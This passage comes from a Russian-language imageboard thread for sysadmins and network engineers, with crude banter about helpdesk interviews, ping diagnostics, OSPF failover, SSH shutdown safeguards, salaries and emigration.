Если ты удалишь или изменишь хоть один символ ключа, то будет отличается его HMAC если я верно помню название чексуммы
Поэтому поясняй что хочешь и куда сделать

18 дек, 11:28 138 1152369

>>49761 (OP)
Какие вопросы обычно задают на интервью с хелпдеском?

Ответы52374 52377

18 дек, 11:34 139 1152374

>>52369
Могут какую угодно хуйню и чушь спросить
"Типа мне вчера настроили доступ на удаленную шару, а сегодня не работает, что за хуйня" - да иди нахуй пидрила, свечку не держал, могу настроить только нормально занова.

18 дек, 11:36 140 1152377

>>52369
Ты хочешь пойти на обычную первую линию поддержки пользователя? Поддержка по телефону, дистанционная или принять заявку и подойти?

Если ты про HD эникейный, то общие вопросы - что такое DHCP, что такое Proxy, что такое DNS, VPN
Почему может не работать интернет, типы IP адресов (белый, серый (192.168/16 172.16/12 10.0/8), 169.254/8 - линклокал и локалхост 127.0/8)
что такое маска подсети и для чего нужна, вряд ли попросят её рассчитать, но можешь глянуть
основные команды в windows - ping, tracert, ipconfig
Ну и модель оси, просто иметь представление

Это наверное минимальный набор техпода

Давай подробнее куда идёшь и на какой техпод, и я тебе подробнее распишу

Ответы52380

18 дек, 11:44 141 1152380

>>52377
Первая линия, по телефону.
Иду в компанию у которой своё йоба ПО и которая обслуживает клиентов этого ПО за ПО сказали похуй, с ним обращаться научат. Главное уметь в обслуживание офисной техники и вот этого всего

Ответы52386 52554

18 дек, 11:59 142 1152386

>>52380
А, ну смотря какое ПО и с чем оно работает, если как-то связано с настройками интернета, тогда то, что я писал выше, если один-эсс, тогда могут спросить про то как будите удалённо подключаться, что такое IP адрес, что такое HOSTNAME
Могут дать задачку:
Как с ПК1 подключиться к ПК2, если ПК1 192.168.1.10/24, а ПК2 192.168.2.10/24 - ответ типа сделать пинг, или попробовать по SMB (\\192.168.2.19), если пинга и подключения нет, при этом ПК1 в сети и сеть видит, то отправить вопрос самому заказчику, чтобы обеспечил доступ/маршрутизацию до ПК

Какие требования у работодателя, ты хоть перечень напиши, что у них в поиске соискателя написано

Аноним 18 дек, 15:45 143 1152549

>>52301
Я это к тому что говорилось о неких сборщиках до этого. Мало ли.
Ну тогда вообще-то это может быть из-за недостаточной мощности БП. Неправильно рассчитана.
А еще может так быть с наступлением холодов электросеть не выполняет договор и поставляет электричество с заниженным напряжением. Мой рекорд- 150 В. Ниже уже идет постоянная перезагрузка.

Ответы52745 60044

18 дек, 15:57 144 1152554

>>52380
Veeam?

19 дек, 07:55 145 1152745

>>52549

>Мало ли

А, ну так с процом ошибиться сложно, разве что очень сильный дядька попадется и вкорячит его поперек сокета. А с кассетой легко, там только внутри все чисто, чтоб анус фены можно было на ходу дергать. А снаружи торчат обычные тоненькие кабели из четырех жил. Защемили один такой между кассетой и матерью и привет. А то что сразу не заметили - ну, бывает. При старте-то они минут пять ревут как "штука" в пикировании, пока post проходит. На каникулах уже покопаюсь. Обороты штатные, людей там все равно нет, на уши давить некому.

Ответы60044

19 дек, 17:52 146 1152928

>>52312
В принципе, да. Незаменимых, конечно, нет. Но у меня довольно высокая квалификация. Разумеется, из Индии привезти человека проще, но шансы есть всегда.

Ответы53374

19 дек, 18:09 147 1152941

Ну чё, бекоины продали?

1,5 Мб, 1600x1195

19 дек, 23:13 148 1153117

Cпецы, дайте лайвхак:

Что говорить техподдержке провайдера чуваку, чтобы он понял, что ему звонит не Антон Уральский, что у меня реально проблемы с интернетом, и что я уже включал и выключал роутер.

Ответы53149 53218 53302

19 дек, 23:37 149 1153149

>>53117
авторизайшен фейл сервер не доступен

19 дек, 23:39 150 1153151

так и говори

20 дек, 01:11 151 1153218

>>53117
Я говорю состояние индикаторов подключения кабелей, есть ли связь до основного шлюза, ешё говорю что пробовал выходить на связь что через маршрутизатор, что с напрямую подключенным к компу кабелем. Перед этим на всякий случай пингую 8.8.8.8 и kremlin.ru

Ответы53539

20 дек, 09:54 152 1153302

>>53117
Когда я начинал работать с техпода провайдера, то обычно шарящие чуваки говорили: у меня не работает интернет, не идёт/идёт пинг до туда, пингую по IP, с двух+ устройств, антивирус выключен, пробовал напрямую, аплинк до вашего коммутатора есть

Ответы53539

20 дек, 12:00 153 1153374

>>52928

>В принципе, да.

Что ты такое делаешь?
Кардиохирург что ли?
Разработчик топовый с математическим образованием?

Ответы53382 54636

20 дек, 12:26 154 1153382

>>53374

>Кардиохирург

В Штатах Обама убил элитность профессии врача - зарплата упала в разы и очень многие разъехались по домам.

>>53374

>Что ты такое делаешь?

Какой-нибудь специалист по машинному обучению с красным дипломом Мехмата - их в Яндексе много и почти все со временем уезжают за бугор.

мимо проходил

Ответы53384

20 дек, 12:28 155 1153384

>>53382

>Какой-нибудь специалист по машинному обучению с красным дипломом Мехмата - их в Яндексе много и почти все со временем уезжают за бугор.

Аааа ну если тот анон такой, то Welcome to USA, но почему-то у меня сомнения.

Ответы53388

382 Кб, 940x901

20 дек, 12:32 156 1153388

>>53384
На самом деле уехать просто, если у тебя свободный английский и нет родственников, которых надо содержать. Просто ищешь работу за бугром, также как и на hh.ru проходишь сначала удаленное собеседование, потом один раз - очное. Конечно, выбор вакансий меньше, а требования выше, т.к. ты будешь обходиться компании дороже, но не настолько выше, чтобы у среднего админа не было никаких шансов. Гораздо чаще всё упирается в язык/семью...

Ответы53389 53543

20 дек, 12:35 157 1153389

>>53388
А есть ли смысл быть админом мигрантом-таджиком там, если можно сидеть в ДС в России и иметь примерно тот же уровень жизни?

Ответы53394

20 дек, 12:55 158 1153394

>>53389
Это слишком сложный вопрос, чтобы на него можно было вообще ответить. Сколько людей - столько и историй...

Есть те, кто здесь работали на заводах всякими ведущими инженерами и получали копейки, уехали туда и там работают тоже на заводах, но обычными работягами. Живут спокойно, ни в чем нужды не испытывают и уверены, что на пенсии не будут голодать. С одной стороны это такой профессиональный дауншифт, с другой они уровень своей жизни при этом явно улучшили...

Бывают, кто едет без образования и навыков - работает там в сфере обслуживания (официант, фастфуд) и если здесь им приходилось выживать на копейки, то там они имеют тот же уровень жизни без всяких напрягов.

А вот тех, кто бы имея здесь высокий уровень жизни, уехав, значительно бы его улучшил и правда мало - в основном топовые востребованные специалисты. Однако всё равно - это уровень среднего класса, миллионером что здесь, что там, работая на дядю, стать невозможно - не нужно себя обманывать! Другое дело, что там больше возможностей для открытия бизнеса, для инвестирования, для того, чтобы банально накопить хоть какой-то начальный капитал.

Хотя сами, что американцы, что европейцы, при всём при этом живут 100% в кредит, который автоматически закрывается работодателем, путем зачисления зарплаты на кредитный счет. ЛОЛ, да? Просто людям в голову не приходит, что можно напрячься, накопить денег и начать инвестировать/вести свое дело - зачем, если они уже хорошо живут и уверены в том, что будут обеспечены в старости? Плюс там нет такого расслоения по доходам в обществе как у нас, т.е. люди менее завистливые и у них меньше мотивации стремиться сделать головокружительную карьеру и/или стать миллионерами.

Ответы53402

200 Кб, 600x741

20 дек, 13:15 159 1153402

>>53394
Там есть понятие среднего класса, вот старый пик, типа % от зарплаты цены iphone x в разных странах.
Если тут я считаюсь успешным с своими жалкими 120к в месяц, за которые убиваюсь на двух работах, то в США - 3к долларов - это зарплата охранника.
Многие начнут спорить о том, что там американцы платят из налоги, подавая каждый год декларацию, могу парировать тем, что в рашке мы помимо 13% из ЗП платим ещё 30% от работодателя на каждый выплаченный рубль, итого с 100к государство в чистом виде получает 43к, а на оставшиеся 87к рублей (100к -13%, и 30% взносов от работодателя) мы покупаем товары и услуги с 18% НДС, фактически из выплаченных суммарно 143к работодателям мы имеем только 71400, ага, маньки, это чуть меньше половины средств
И это гениально работает, так как рабы не думают о том, сколько на самом деле государство с них берёт денег.
Так вот, возвращаясь к среднему классу, по всем критериям среднего класса, я с своими жалкими 120к в месяц даже близко не могу с ним стоять, мне как минимум надо увеличить зарплату в два раза, чтобы я мог быть среднем классом, с поправкой на курс, в свою очередь будучи виндоцисколинуксоидом я бы мог получать больше примерное в 1.5-2 раза
https://www.tupa-germania.ru/rabota/zarplata-it-germania.html

Да, там были бы другие цены, что-то дешевле, что-то дороже, но я был бы уверен, что мои фантики деньги будут иметь покупательскую способность, что если я останусь без работы моё государство меня не бросит, короче был бы более социально защищён

Ответы53415 53437

20 дек, 13:26 160 1153415

>>53402
В ДС и ДС2 уровень жизни примерно сопоставим с Европейским. А чаще и выше, чем европейский. Это факт.
Касательно США соглашусь. Но если ты из ДС и работаешь за 120к и имеешь жилье, то есть ли смысл перекатываться в США, снимать там хибару, не иметь толком друзей и быть мигрантом из России? Сомневаюсь.

Ответы53437 53438

20 дек, 13:40 161 1153428

Откуда они, блядь, лезут?!
https://reestr.minsvyaz.ru/reestr/87473/

Ответы53431 53506

990 Кб, 1600x1638

20 дек, 13:43 162 1153431

>>53428
Ulyanovsk.Berkeley Software Distribution

20 дек, 13:48 163 1153433

https://www.gazeta.ru/business/news/2017/12/20/n_10958084.shtml

В России произошел крупный сбой в работе кассовых аппаратов. Об этом сообщает РИА «Новости».

Уточняется, что из-за поломки закрыли часть магазинов российского ретейлера «Магнит». С подобными проблемами столкнулись и заправки «ЛУКойла», «Газпром нефти», а также сети магазинов «Мария-Ра», «Аникс», «Ярче», «Автоштрих» и DNS.

В Федеральной налоговой службе рассказали, что в таком случае торговые точки вправе проводить расчеты без этой техники. Однако после того как система вновь заработает, продавцы обязаны будут сформировать кассовый чек коррекции с общей суммой неучтенной выручки.

В свою очередь в компании Group-IB пояснили, что массовый сбой касс мог произойти из-за проблем в прошивке нового ПО.

____________________
____________________

Никто не работает с кассовым оборудованием? Что это было?

Ответы53440

20 дек, 13:50 164 1153437

>>53415
Живу в ДС с женой, суммарно зарабатываем 150к. Сестра жены живет в пригороде Вены, работает полдня. Так вот они с мужем суммарно и зарабатывают намного больше и живут заметно лучше. Интересно, что мы в ДС делаем не так?

>>53402
Про налоги у нас ты хорошо, что напомнил. Действительно это грабеж самый натуральный. Чтобы платить сотруднику 100к в месяц на руки, работодатель должен еще около 60к заплатить государству. При этом все товары стоят на 18% дороже из-за НДС. Т.е. получается, что с каждого созданного нашим трудом рубля, государство забирает себе почти три четверти... Налог в 75% - это что-то с чем-то. Не удивительно, что он поделен на части и сокрыт от простых людей, ведь если человеку выдать на руки 100к, а потом заставить 75к сдать обратно - люди сразу поймут что к чему!

Ответы53682

20 дек, 13:50 165 1153438

>>53415
Ну, я пока никуда и не еду, вот когда Рамзан станет президентом, после Пыни, тогда смажу анус лыжи, и поеду

20 дек, 13:50 166 1153440

>>53433
Нас задело, но что это было - ХЗ, проблема на стороне кассового ПО.

20 дек, 15:03 167 1153506

>>53428
Давеча тут упоминался некий мерзкий чЯтик, который зачем-то купили на смену исправно работавшему жабберу. В Реестре его нет, 100%. А вот чего в Реестре нашел: https://www.dlg.im/ru/download/enterprise
Кто-то использовал, не? Просто клиент доступен, а сервер по запросу, даже цены нет.

Ответы53540

20 дек, 15:58 168 1153539

>>53218
>>53302
Спасибо.
А пинг есть, но СКОРОСТИ НЕТ?

Ответы53574

20 дек, 15:58 169 1153540

>>53506
Практика показывает, что запретить людям пользоваться теми чатиками, которыми они привыкли, - абсолютно нереальная задача. Хуже того, та же слака настолько удобна и функциональна, что ни одна закрытая альтернатива не может сравниться. И это касается любого популярного социального ПО. Силовые попытки запрета, обычно, выливаются в нелояльность со стороны продвинутых и прошаренных сотрудников и их стремительный отток из компании...

Ответы53586

20 дек, 15:59 170 1153543

>>53388
Эбать, это реальный график? Чет не верю.

Ответы53548

20 дек, 16:02 171 1153548

>>53543
Так это ты еще графика приезжающих не видел! Вот только если уезжают молодые специалисты выпускники топовых ВУЗов, то приезжают таджики всякие...

Ответы53559

20 дек, 16:12 172 1153559

>>53548
Вузы в стране в год выпускает миллион специалистов. Каждый третий из них - из топовго ВУЗа?

Ответы53562

20 дек, 16:17 173 1153562

>>53559
Я бы поделил московские технические ВУЗы на 4 ранга:
S - МГУ (мехмат, ВМК, физфак), Физтех
A - Бауманка, МИФИ...
B - МИРЭА, МАИ...
C - все прочие

Так вот A и S - это топовые. Некоторые специальности, некоторых факультетов в B - тоже топчик. То есть в ДС от трети до половины всех выпускников технарей попадают в категорию выпускников топовых ВУЗов.

Ответы53564

20 дек, 16:20 174 1153564

>>53562

>. То есть в ДС от трети до полов

я бы переделал на:
S - МГУ (мехмат, ВМК, физфак), Физтех
A - Бауманка, МИФИ...
С - прочее, всё равно что.

Ответы53572

20 дек, 16:20 175 1153565

только причем тут админ? Админ это уровень техникума.
ВУЗ это для разработчиков

Ответы53572

20 дек, 16:27 176 1153572

>>53564
Ну это меньше соответствует реалиям. Сам заканчивал МИРЭА - там на одной кафедре давали просто потрясающую подготовку по тем то временам! А на соседней кафедре не учили вообще ничему...

>>53565
Годовой курс дискретной математики. Курс архитектуры сетевых протоколов и отдельный курс сетей. Отдельные семестровые курсы по функциональному и процедурному программированию, а также два семестра ассемблера и ООП. Годовой курс по архитектуре операционных систем (на примере unix).

Короче, помимо программирования у меня была и приличная такая база общеайтишных предметов. При том эта подготовка была одинаковой и для АСУшников, и для кодеров, и для всех остальных на IT факультете (тогда в МИРЭА он еще ВМС назывался, если что).

Ответы54258

20 дек, 16:28 177 1153574

>>53539

>А пинг есть, но СКОРОСТИ НЕТ?

ping -f 8.8.8.8 -l 1400

Ответы53578

20 дек, 16:32 178 1153578

>>53574

>ping -f 8.8.8.8 -l 1400

Ну пингует он, а толку? Скорости нет почти (допустим).

Ответы53588

20 дек, 16:45 179 1153586

>>53540
Госконтора же. Иначе стал бы я в реестр Минсвязи лазить. А силовая замена состоялась раньше, при внедрении мерзкой хуиты вместо жабы. Хуиты нет в реестре, а это есть. Может, и слак есть, не долистал пока.

20 дек, 16:50 180 1153588

>>53578
Дурак что ли? Пинг с длинной пакета 1400, смотри на задержку и потери

Ответы53592

20 дек, 16:59 181 1153589

>>49761 (OP)

>Курс CCNA: magnet:?xt=urn:btih:B0B3726CA5E04ECEC1937DBCF88BD733401BAF5D&dn=INE CCNA 200-120 videos 2014&tr=udp%3a%2f%2ftracker.openbittorrent.com%3a80&tr=http%3a%2f%2fretracker.hq.ertelecom.ru%2fannounce

>2014

Что-нибудь по-современнее есть?

20 дек, 17:05 182 1153592

>>53588

>Pinging 8.8.8.8 with 1400 bytes of data:

Reply from 8.8.8.8: bytes=1400 time=115ms TTL=50
Reply from 8.8.8.8: bytes=1400 time=114ms TTL=50
Reply from 8.8.8.8: bytes=1400 time=115ms TTL=50
Reply from 8.8.8.8: bytes=1400 time=115ms TTL=50

Ping statistics for 8.8.8.8:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 114ms, Maximum = 115ms, Average = 114ms

Ответы53597

20 дек, 17:11 183 1153597

>>53592
Ответ от 8.8.8.8: число байт=1400 время=4мс TTL=57
Ответ от 8.8.8.8: число байт=1400 время=4мс TTL=57
Ответ от 8.8.8.8: число байт=1400 время=4мс TTL=57
Ответ от 8.8.8.8: число байт=1400 время=4мс TTL=57

А не дохуяли у тебя отклик?

У меня самое большое, что было на MGTS по 10 мс

20 дек, 17:31 184 1153601

Начитался тут смехуечков про halt по ssh. И вот какой вопрос: а защита от дурака есть? Т.е. пользователю с правом на, допустим, halt, при вводе halt хотя бы выдавался запрос на ввод пароля, причём не пользовательского, а на конкретную операцию. И только после этого, убедившись, что пользователь трезв и в своём уме, система бы выполняла именно то, что приказали. Необязательно halt, другие критичные команды.

Ответы53605 53608

20 дек, 17:41 185 1153605

>>53601
Ты можешь с халта убрать пермишены, тащемта есть ещё и poweroff и reboot

Ответы53609

20 дек, 17:44 186 1153608

>>53601
root@TEST:/# ls -la /sbin/ | grep halt
lrwxrwxrwx 1 root root 14 Oct 26 14:59 halt -> /bin/systemctl
Вот, сделай его chmod только для рута, типа как 600, и хватит

Ответы53612 53617

20 дек, 17:46 187 1153609

>>53605
Это понятно. Разрешения меняются не в целом, а в зависимости от того, вошли мы локально или удаленно? По-любому должна быть такая фишка. Уж если винда в терминальной сессии предупреждает: вы не разлогиниться собрались, а выключить меня, потом придётся прийти и включить кнопкой.

Ответы53617

20 дек, 17:51 188 1153612

>>53608
См. выше. Возможно, пользователю и разрешено это, но тогда, когда есть шанс все исправить с прямым доступом. Не только выключение. Так, можно радостно включить ненастроенный файерволл с единственным правилом deny all.

Ответы53615 53616

20 дек, 17:58 189 1153615

>>53612

>Так, можно радостно включить ненастроенный файерволл с единственным правилом deny all.

Да, было дело, я уже как-то так включал по молодости

Ну тогда сложный вариант: molly-guard

20 дек, 17:58 190 1153616

>>53612
http://www.ubuntugeek.com/molly-guard-protects-machines-from-accidental-shutdownsreboots.html

Даже ссылку тебе нагуглил

Ответы53628

20 дек, 17:59 191 1153617

>>53609
>>53608
А нормальные люди по ссх под рутом не ходят.

Ответы53618

20 дек, 18:01 192 1153618

>>53617

>нормальные люди

Кто тебе сказал, что я нормальный, но тащемта да, тут ты прав, в любом случае, я не помню требует шутдаун судо или нет

Ответы53620

20 дек, 18:03 193 1153620

>>53618
Требует-требует. В деб-подобных точно.

Ответы53623

20 дек, 18:05 194 1153623

>>53620
я просто или на центе сижу или на фряхе, кек, как старик, а вот убунты уже сто лет как не видел

153 Кб, 640x480

20 дек, 18:14 195 1153628

>>53616
Спасибо, почитал. Надо будет сам скрипт почитать тоже, попозже.
P.S. Казалось бы, при чем тут Молли?

20 дек, 20:16 196 1153678

Зовут на одинаковую зп в Москву и Питер. Куда лучше деться?

Ответы53790 53868 53897

20 дек, 20:26 197 1153682

>>53437

> Интересно, что мы в ДС делаем не так?

Зарабатываете на двоих всего 150k, разумеется

20 дек, 22:08 198 1153790

>>53678
Единственное преимущество Питера - более доступная аренда жилья. Нехуй думать, едь в Москву.

Ответы53868

21 дек, 01:05 199 1153846

Как искать работу студентишку? Входные данные - полгода опыта и умение писать фронт на vue, знакомство с реактом ну и плюс всякая кроссбраузерная, адаптивная и прочая верстко-хуйня, а еще скиллы питона с джангой. Хочу устроиться хоть стажером, хоть джуном, на парт-тайм часов 30-35 в неделю
но на хх полторы вакансии с частичной занятостью или стажировкой, мб я что-то не так ищу?
хелп ми, аноны :с

Ответы53866

21 дек, 06:38 200 1153866

>>53846
По знакомству. Дураков выкладывать вакансии для студней на ХХ, а потом отбиваться от долбоебов нет. Нет друга, который приведет тебяв контору за ручку, пиздуй в телеграм чат по своему вую и просись на стажировку.

21 дек, 06:49 201 1153868

>>53678
Похуй, ценник на жизнь что там что там однохуйственный.
>>53790
В Питере жизнь спокойнее, москвичи бегают как в жопу выебанные и вечно никуда не успевают.

21 дек, 08:08 202 1153885

Живя в Москве, надо зарабатывать никак не меньше

> 140000 руб., в идеале - 180-240 тыс.руб.

иначе ты нищенка. Выпились лучше из города!

21 дек, 09:04 203 1153897

>>53678
в ДС, конечно, тут возможностей больше, сможешь поменять работу на ещё более выгодную спустя пару месяцев, а Питер он как был провинцией, так и осталя

21 дек, 19:26 204 1154103

Сетевики, это что же получается, если наша компания, к примеру, прикупила блок адресов, нам не обязательно их всех анонсировать в BGP?

Ответы54246

22 дек, 00:07 205 1154194

>>49761 (OP)
поясните как именно зарубили в ссср наше направление микроэлектроники и кибернетического развития? читал где то книгу (па психалогии кажись) в которой чувак приводил рассказ другого чувака как он в 60-х годах бегал по всем высшим советам (он имел туда вход) и кода решался вопрос развития этой отрасли - русские (совки ващет) решили что это НЕ НУЖНО. что это бесовщина. и типа чувак тот, который метался и жопу рвал что бы это развивали - вот тогда он понял как тупо и дебильно устроено общество. как оно психически нездорово.

помните такую книги? что можете за тему пояснить? интересую конкретные воспоминания, статьи, источники, пруфы.

мы могли бы не уступать муррике в этом направлении развития если бы не решили сами свернуть наш проект (который кстати опережал их)

Ответы54288 54568

22 дек, 09:12 206 1154246

>>54103
Ну как бы да. Хотя формально вы должны как раз отчитаться, что вообще эти адреса используете, вплоть до того, что расписать для чего вам какой адрес, т.е. обосновать RIPE, что они вам нужны. Плюс провайдер не примет от вас анонсы слишком коротких префиксов, т.е. если ваша аска маленькая, то придется анонсировать ее всю или половину/четверть. Наконец, в чем смысл зажопить часть адресов? Внутри вы можете и серыми пользоваться.

Ответы54285

22 дек, 10:00 207 1154258

>>53572
Заканчивал СибГУТИ в Новосибирске, программа образовательная похоже что была точно такой же как у тебя. Только ещё матанализ и векторная алгебра были.

Ответы54260

22 дек, 10:04 208 1154260

>>54258
Линейка и матан у нас тоже, конечно, были - по два года, а также еще по семестру: ТФКП и диффуров. Ну и три семестра физики. Но это всё к IT не относится - в любом техническом ВУЗе примерно такие же объемы математики.

272 Кб, 500x375

22 дек, 11:01 209 1154285

>>54246

>если ваша аска маленькая, то придется анонсировать ее всю или половину/четверть

22 дек, 11:05 210 1154288

>>54194

>поясните как именно зарубили в ссср наше направление микроэлектроники и кибернетического развития

Гугли ОГАС Глушкова, я хуй его знает.

22 дек, 20:23 211 1154568

>>54194
>>54194

>поясните как именно зарубили в ссср наше направление микроэлектроники и кибернетического развития?

В кратце из новейшей истории России:
Для промышленности PLC совок пилил сам, и пилил заводы автоматические и как китай копировал гейропейские и пиндоские. т.е купили линию автоматического производства хуйни и накопировали тысячи, и свои PLC туда насовал и институты по разработке. С развала совка siemens понял что ему эта конкуренция нахуй не нужна и с помощью взяток, демпинга и нечестной конкуренции завалил институт по разработке промышленной автоматики.

437 Кб, 1920x874

22 дек, 20:27 212 1154571

22 дек, 21:58 213 1154636

>>53374
Я умею настраивать роутеры. Пока этого вполне достаточно, поверь. Хотя, вот, думаю разобраться и со свичами. Научиться и их настраивать )

Ответы54684

22 дек, 23:05 214 1154684

>>54636

>разобраться и со свичами. Научиться и их настраивать )

Там где нужно настраивать свичи, твоих знаний по настройке "роутеров" поднять PPPoE, DHCP, WiFi и тыкнуть на save - это нихуя не умение настраивать роутеры блядь!
будет недостаточно.

Ответы54763

23 дек, 06:36 215 1154763

>>54684
ты, пожалуйста, не оценивай не зная меня мое умение настраивать роутеры. А я, если хочешь, могу рассказать, чего именно я не знаю про настройку свитчей, что не умею итд. Я вообще-то сейчас говорил о том, что мои знания в датацентрах равны примерно нулю. А не про вланы, спаннинг три, кос и прочий mclag...

23 дек, 10:51 216 1154796

40-летний таксист из Тамбова стал программистом

https://habrahabr.ru/sandbox/113130/

Метки: scala, java, c++, haskell, 1c
Войти в айти не хотите ли?

Ответы54805 54806 54839

23 дек, 11:33 217 1154805

>>54796
Красиво, но больше похоже на вброс.

23 дек, 11:43 218 1154806

>>54796
Согласен.
Тем более сказки о том, что бывшему таксисту-1Сснику предложили сразу прийти на 210к разработчиком С

23 дек, 14:18 219 1154839

>>54796
Это зазывала, вот рискнуть написать сказку про вояку с 40летнипм опытом в казарме ставшим программистом никто не станет.

23 Кб, 401x472

24 дек, 03:08 220 1155091

Вот такая вот сетка есть, сетевики.
RTR1 и RTR2 находятся в AREA0 OSPF. STACK находится в stub-AREA1. Оба RTR анонсируют STACK маршруты по-умолчанию с разными метриками: RTR1 - 100, RTR2 - 200.
Каждый RTR подключен к своему провайдеру. На обоих RTR включен тест IP SLA до дефолтного шлюза провайдера.

Что сейчас: весь трафик из LAN в Интернет идёт, очевидно, через RTR1. Если WAN-интерфейс RTR1 отказывает, то этот трафик всё равно идёт в Интернет через RTR1, который перенаправляет их на RTR2, ну а тот уже шлёт пакеты куда надо. Всё это происходит, потому что анонсы LSA3 дефолтных маршрутов для stub-зон не зависят от наличия на анонсирующем ABR маршрута по-умолчанию, и STACK нихуя не узнаёт о том, у его дефолтного шлюза уже нет маршрута в Интернет.

Что нужно: если дохнет провайдер RTR1, STACK начинает использовать в качестве шлюза по-умолчанию RTR2.

Чего не хочется:
1. Делать AREA1 нормальной зоной с последующим анонсированием обоими RTRами маршрутов по-умолчанию с помощью LSA5;
2. Перебарщивать со списками контроля анонсов.

Такие дела, коллеги. Пока что склоняюсь к решению плюнуть на это дело, ибо время хождения пакета по сети увеличивается не так уж и сильно. Но, всё-таки, чёт НИКРАСИВА мне.

Ответы55667 55670

24 дек, 16:28 221 1155310

Посоны, а вы встречали тяночек системных администраторок? Или сетевых инженерок? Короче, чтобы возились с компьютерами и сетями. И чтобы не жирухи/фемки/лесби были

Ответы55312 56221 56222 56233

24 дек, 16:34 222 1155312

>>55310
Да, есть знакомая сетевик.

Ответы55315

24 дек, 16:44 223 1155315

>>55312
Ну и как она из 10? Няшная? Есть кунчик? Какой рост/вес?

Ответы55321

24 дек, 16:49 224 1155321

>>55315
Обойдешься

Ответы55325

24 дек, 16:57 225 1155325

>>55321
Блин. Ну вот так всегда. А как же хочется няшную системную администраторочку, чтобы няшиться с ней ночными сменами на диванчике в серверной под синтвейв в свете мигающих светодиодных индикаторов...

Ответы55327 55661

1,9 Мб, 750x750

24 дек, 16:59 226 1155327

>>55325

> :[

218 Кб, 714x714

24 дек, 23:01 227 1155599

>>49761 (OP)
может, задам платиновый вопрос, но:
что из IT учить, если я не собираюсь полностью становиться погромистом? Работаю в офисе, международная торговля, есть время учить всякое, но не уверен, есть ли язык программирования, который пригодится неайтишнику. Мне один знакомый говорит, SQL обмазываться, но он сам только учить начал, сам продаваном работает, поэтому я у вас лучше спрошу. Перефразируя вопрос, знание какой IT области сделает меня более ценным специалистом в "аналоговых" специальностях, типа логистики, аудита, хуй знает куда ещё занести может, но вы поняли.

Ответы55601

24 дек, 23:03 228 1155601

>>55599
Ну, если рассуждать логически, то не чистому айтишнику нужны от айти в первую очередь инструменты автоматизации какой-нибудь своей автоматизируемой рутины. Следовательно нужно что-то максимум прикладное, чтобы решать подобные задачи. Из всех ЯП что я знаю (я на самом деле нихуя не спец) самый прикладной питон. его и учи, дальше не пропадёшь.

Ответы55605

24 дек, 23:07 229 1155605

>>55601
А что, новичок может начать с питона прямо? У меня из опыта только html 4 много лет назад.

Ответы55606

24 дек, 23:10 230 1155606

>>55605
А питоне не сложный, да и сделан как раз так чтобы с него начинать. Ну, если верить книжкам от О'Рейли.

Ответы55613 55668

24 дек, 23:16 231 1155613

>>55606
окей, благодарю за совет.

25 дек, 01:55 232 1155639

>>49761 (OP)
Где можно найти удаленку part time маня админу-сетевику? Могу циски и жужиперы, могу пердолить линухи немного и писать всякое говно на питоне

Ответы55640 55663

25 дек, 01:58 233 1155640

>>55639
И да, вышки неть

25 дек, 08:06 234 1155661

>>55325

>няшную системную администраторочку

нет их няшных.

25 дек, 08:09 235 1155663

>>55639

>Где можно найти удаленку part time маня админу-сетевику?

Ох уж и не знаю. Пытался я как-то найти подобное.
Но это либо настройка д-линка за три копейки, либо компьютерная помощь.
Админом можно на удаленке разве что линукс пердолить. Сетевиком найти довольно проблематично. Во всех компаниях, где нужны сетевики, они уже есть в штате. А там, где сетевики не нужны на фул тайм, они и на парт тайм не нужны.

25 дек, 09:02 236 1155667

>>55091
Зачем тебе вообще здесь две зоны оспф? Разрулить ситуацию можно либо с помощью протоколов HSRP/GLBP, либо с помощью технологии OER/PFR. Последнюю, настоятельно рекомендую.

Ответы56221

25 дек, 09:08 237 1155668

>>55606

>питоне не сложный

Я тоже так думал, пока не столкнулся с лямбдами в декораторах для обертывания конструкторов/методов в ООП. Конечно, можно этим и не пользоваться, но тогда и рассчитывать на приличную работу не стоит. Плюс
в пайтоне дохуя либ, без знания которых этот язык просто нахуй не нужен.

Ответы55671

25 дек, 09:09 238 1155670

>>55091

>аршрутов для stub-зон не зависят от наличия на анонсирующем ABR маршрута по-умолчанию, и STACK нихуя не узнаёт о том, у его дефолтного шлюза уже нет маршрута в Интернет.

Как насчет того, чтобы использовать reliable conditional default routing?

Ответы56222

25 дек, 09:11 239 1155671

>>55668

>Конечно, можно этим и не пользоваться, но тогда и рассчитывать на приличную работу не стоит. Плюс

>в пайтоне дохуя либ, без знания которых этот язык просто нахуй не нужен.

Я так понял, что анон, который изначально задал вопрос, вообще не работает в ИТ. Так что он и не планирует работать программером.
Я правда не понимаю, зачем ему вообще что-то подобное изучать. Не проще ли сосредоточится на своих хард скиллз

Ответы55695

25 дек, 09:38 240 1155682

Двачерсы, поясните мне про L2 VPN, про всякие там VPLS или MPLS и IPoE, вот с L3 VPN уровня point TO point всё ясно, есть сервер, есть клиент, начал читать про VPLS и в ужасе охуел насколько это сложно, сложнее любого BGP.
Короче, объясните как для пятилетнего, что это как и куда работает, можете подогнать сравнительный анализ, в чём плюсы и тп, вообще расскажите для тупого и с самого начала, где используется в чём плюхи в отличии от L3, я так полагаю, плюхи в том, что удобен при site to site

Ответы55692 55695 55878

25 дек, 10:06 241 1155692

>>55682

>плюхи в том, что удобен при site to site

потерял мысль и отвлёкся, я у мамы аутист

25 дек, 10:18 242 1155695

>>55682
Про то как работает vpn в MPLS сетях я тебе не расскажу - сам не знаю. Но L3 от L2 в данном случае отличается только одним - в первом случае ты гонишь по своей провайдерской сети ip кадры, а во втором - эзернет фреймы. Сама MPLS сеть при этом никак не меняется, только инкапсуляция.

Преимущество L2vpn очевидно - тебе не нужно делать маршрутизацию внутри своей сети, т.е. удаленные площадки будут в одном L2 сегменте - всякие виндовые файлшары будут работать, как будто компы рядом стоят.

>>55671
Хард скилы важны, конечно, но со временем без навыков автоматизации и программирования будет всё сложнее и сложнее найти хорошую работу - сети, серверные, ПО растут и усложняются постоянно при том по экспоненте, соответственно, старые подходы к управлению и администрированию с каждым днем всё менее и менее эффективны. И пайтон - отличный старт, чтобы окунуться во всё это, но не нужно думать, что это простой язык. Если уж учить язык, то серьезно, иначе просто не получится его эффективно использовать в работе.

Ответы55699

sage 25 дек, 10:24 243 1155698

